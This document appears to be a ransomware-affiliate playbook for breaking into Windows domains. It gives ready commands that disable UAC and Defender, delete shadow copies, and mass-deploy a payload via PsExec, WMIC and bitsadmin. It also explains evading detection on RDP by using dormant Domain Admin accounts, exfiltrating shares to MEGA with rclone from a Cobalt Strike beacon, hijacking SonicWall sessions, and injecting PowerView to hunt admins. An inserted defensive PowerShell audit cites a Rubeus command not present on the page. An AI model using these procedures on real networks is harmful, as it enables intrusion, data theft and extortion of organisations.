!--------------------------------------------------------------Attacks--------------------------------------------------------------!
!---BAT---!
Always run everything as Administrator:
uac - removes the pop-up window asking the admin for permission to run
defoff - kills Defender (does not work everywhere; afterwards check for the MsMpEng process in taskmgr)
RDP - opens port 3389
del - deletes shadow copies (asks for confirmation to delete, press y)
NS - mounts hidden system drives (pass:98) !! use after AV has been killed
NLA+BACK - sets up NLA + backdoor for passwordless login; it works like this:
in the logon window (where it asks for credentials) press Win+Y, a cmd window pops up;
type taskmgr, open the Users tab, right-click any user - Connect
ps - does not work on Windows 10 / requires a password
ASSEMBLING A BAT FILE TO COPY A FILE ACROSS THE WHOLE DOMAIN
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe" "C:\windows\temp\ "
SAVE AS "COPY.BAT"
ASSEMBLING A BAT FILE TO LAUNCH A FILE ACROSS THE WHOLE DOMAIN
start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /cc:\windows\temp\fx166.exe
SAVE AS "EXE.BAT"
ASSEMBLING A WMI BAT FILE TO COPY AND RUN THE FILE ACROSS THE WHOLE DOMAIN
start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\DOMAIN CONTROLLER\share$\ fx166.exe %APPDATA%\fx166.exe&%APPDATA%\fx166.exe"
!-----------------------------------------------------------------RDP-----------------------------------------------------------------!
IF RDP IS REALLY NEEDED IN THE LOCAL LAN :: HOW NOT TO GET CAUGHT ::
1. Pick a server OS, ping it, it is up. List the directory:
`ls \\REMOTE-HOSTNAME\C$\Users`
Sort by Modified. Where there is a recent modification it is DEFINITELY NOT POSSIBLE to go in under those users, because the following situation easily arises: you go in, dump shares / test something, and suddenly this user comes to this PC and sees the results of your work... Detection. Cleanup. Game over.
So pick a user who last came to this server a year ago, say.
I think the mechanics are clear?
2. Pick a user from DA (Domain Admins) who is in DA but is almost never used
shell net group "Domain Admins" /domain
This is our list of DAs
Next, dump the information on each user in turn
`shell net user Administrator /domain`
Look for the Last Logon line, i.e. when the user last logged on to the network (on any PC in it)
If the date is the month before last, half a year or a year ago, excellent. That is what we need. Most likely it is either a service account or an admin nobody uses, and it definitely will not interfere with your RDP.
Such simple tricks will help you not get caught stupidly on RDP
3. Do not stay on the RDP; once finished, do Logoff (MANDATORY). Not to be confused with simply closing the RDP window.
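Added defender-side example, not part of this manual: step 2 above selects Domain Admins whose Last Logon is months old because nobody will notice a session under them. The same query, run by the defender, lists those dormant privileged accounts so they can be disabled, and marks the ones carrying an SPN, which are what the Rubeus kerberoast /ldapfilter:'admincount=1' command earlier on this page targets. It assumes the ActiveDirectory RSAT module is installed; the 90-day cut-off and the group list are assumptions.

```powershell
# Added example (not from the manual). Assumes the ActiveDirectory module; 90 days is an assumed cut-off.

function Find-DormantPrivilegedAccounts {
    param(
        [string[]]$Groups = @('Domain Admins', 'Enterprise Admins'),
        [int]$DormantDays = 90
    )
    Import-Module ActiveDirectory -ErrorAction Stop
    $cutoff = (Get-Date).AddDays(-$DormantDays)
    foreach ($g in $Groups) {
        # -Recursive expands nested groups; keep only user objects
        Get-ADGroupMember -Identity $g -Recursive |
            Where-Object { $_.objectClass -eq 'user' } |
            Get-ADUser -Properties LastLogonDate, PasswordLastSet, ServicePrincipalName |
            ForEach-Object {
                # LastLogonDate derives from lastLogonTimestamp, which replicates with up to 14 days
                # of lag: good enough for "months old", not for "today".
                $dormant = (-not $_.LastLogonDate) -or ($_.LastLogonDate -lt $cutoff)
                $pwAge = if ($_.PasswordLastSet) { ((Get-Date) - $_.PasswordLastSet).Days } else { $null }
                [pscustomobject]@{
                    Group       = $g
                    Account     = $_.SamAccountName
                    Enabled     = $_.Enabled
                    LastLogon   = $_.LastLogonDate
                    PasswordAge = $pwAge
                    HasSPN      = ($_.ServicePrincipalName.Count -gt 0)   # roastable privileged account
                    Dormant     = $dormant
                }
            }
    }
}

# Dormant accounts first: these are the ones to disable or move into a break-glass process.
Find-DormantPrivilegedAccounts |
    Sort-Object -Property @{ Expression = 'Dormant'; Descending = $true }, LastLogon |
    Format-Table Group, Account, Enabled, LastLogon, PasswordAge, HasSPN, Dormant -AutoSize
```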
!--------------------------------------------------------Additional material--------------------------------------------------------!
!---RCLONE MANUAL---!
1. Download rclone from the site, create a file rclone.conf and put it in the same folder as the exe
2. Then open cmd as administrator, go to the folder with the program and the configuration file and run: rclone config
3. A menu appears in which we create a config (roughly, we enter the MEGA login and password); after the credentials are entered the program writes them, encrypted, to the rclone.conf file.
4. Take the resulting rclone.conf and the program itself and put them on the host from which we will pull the data; of course, better in a secluded place
5. In the CS beacon go to the folder with the config and the program and run:
shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
remote:Data - change only this.
"remote" is the name of your MEGA config.
"NT" is your directory in MEGA where the data will be uploaded; if it does not exist it is created automatically.
Well, I think it is clear that what is in quotes is what we are exfiltrating; it can be anything, even the whole disk.
remote - the config name we gave in step 3; Data - the folder in MEGA where the data is uploaded
!---SonicWall---!
for those who need to work with SonicWall through browser sessions
Using a Web Browser to Access
- take the session from the script output, for example "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg="
- open the browser in incognito mode, open the developer console (js-console)
- encode the session ID in base64
>> btoa("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
- enter the URL https://target (it redirects to https://target/cgi-bin/welcome)
- go to the console in application/cookies, add a cookie
swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=
- in the browser (where .../cgi-bin/welcome) edit the URL to https://target/cgi-bin/portal
- get access to the resource under the user session
!---Installing and configuring Citrix---!
----------------------------------
Windows 7 or Windows 10
On it, Internet Explorer 11 or Google Chrome
After installing the browser, set up Citrix Workspace
For Win 7: https://www.citrix.com/en-gb/downloads/workspace-app/legacy-workspace-app-for-windows-ltsr/workspace-app-for-windows-1912-ltsr-cu2.html
For Win 10: https://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.html
Install Citrix
Then in the browser log in to the Citrix web interface, enter the login and password, then launch the desktop (it opens either in the browser or in the Citrix app)
After entering the desktop, bring up an agent in CS
!-------------------------------------------------------------Questions-------------------------------------------------------------!
14) If you find some password, you can also run it through smb_login, a Metasploit module; I will provide Metasploit and explain how to use it. smb_login shows which servers or workstations can be accessed with these credentials.
How to sort collected AD from the network
1) Download FileZilla
2) Download Putty and run Putty through Tor:
Go to https://www.torproject.org/download/tor/
Download the Expert Bundle (ATTENTION: that one, not the browser)
Unzip, go to the Tor directory and run tor.exe
After a few seconds it reaches the line 100% Done
In the Putty settings go to Proxy, set SOCKS5, IP 127.0.0.1, port 9050
3) Connect to the server via FileZilla > go to the "Script" directory and put the AD files next to the script
4) In Putty connect to the server, go to the directory with the script and run
./script.sh
5) Done; go back to FileZilla and pick up the sorted output. Afterwards be sure to delete the AD files and the sorted folder; if the sorted folder cannot be deleted, just rename it to anything.
Manual on UserHunter: with it we find those machines. We also need ad_users to take the SID from there for the golden ticket, but more on that later.
1. Make a list of targets
1.1 Open ad_users and look for someone potentially interesting to us: admin / engineer / IT staff
take the account logins from sAMAccountName
1.2 Take the list of domain admins
1.3 Put the first and second into the file list.txt
2. Upload PowerView
2.1 powershell-import /home/user/soft/powerview/view.ps1
2.2 --comment: import PowerView from /home/user/soft/powerview/view.ps1
2.3 Turn on hunting
2.3.1
psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt
instead of 1884, the PID of a process where we have enough rights to inject.
x64 or x86 - the bitness of the process, see tasklist
C:\ProgramData\list.txt must contain the list we made in step 1.
After 5-10-20 minutes look at the result in out.txt. It is written all at once when it finishes, so if the file is 0 bytes it is either still running or AV caught it (if AV caught it, you will see it)